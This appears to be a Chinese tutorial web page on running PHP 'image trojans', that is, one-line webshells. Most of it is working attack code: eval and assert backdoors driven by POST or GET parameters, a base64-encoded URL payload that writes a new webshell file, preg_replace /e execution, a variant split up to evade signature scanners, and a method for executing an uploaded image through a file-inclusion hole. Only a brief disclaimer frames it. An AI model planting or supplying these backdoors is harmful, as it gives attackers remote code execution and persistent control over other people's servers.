php⼀句话图⽚⽊马怎么运⾏,php图⽚⽊马怎么运⾏
PHP图⽚⽊马的的运⾏⽅法
1、标准的写法,直接通过eval执⾏php代码@eval ($_POST['code']);
2、动态执⾏assert⽣成⼀个⽊马⽂件(隐藏性最好的⼀种)@$_GET['a']($_GET['code']);
3、使⽤⽅法:从url中传⼊下⾯参数执⾏后会在当前⽬录⽣成⼀个c.php的⽂件/index.php?
a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,
base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
a参数为eval时会报错(因为eval不是函数)⽊马⽣成失败,为assert时同样报错,但会⽣成⽊马。
php如何运行代码4、使⽤preg_replace执⾏代码(⾥⾯前⾯只要⽤⼀个的任意字符串就可以,如果不⼀样的话命令可能会被执⾏多次)@preg_replace("/re/e", $_POST['code'], "re");
5、把特征码打散session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
6、重命名任意⽂件$reg="c"."o"."p"."y";
$reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);
include的漏洞使⽤⽅法
有时候我们会上传⼀些图⽚⽊马但是却不能执⾏,这个时候如果有⼀个include的漏洞,那么图⽚⽊马就可以执⾏啦。
如果php代码⾥有⼀个include($_GET['controller']) 且还有⼀个url路径为:/index.php?controller=user,这个看起来就是⼀个根据参数包含执⾏对应控制器的代码,但是如果url路径⾥的参数改成这样:/index.php?uid=/upload/images/muma.jpg,这个时候⽊马就执⾏啦。
以上内容仅供参考!
推荐教程:PHP视频教程
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论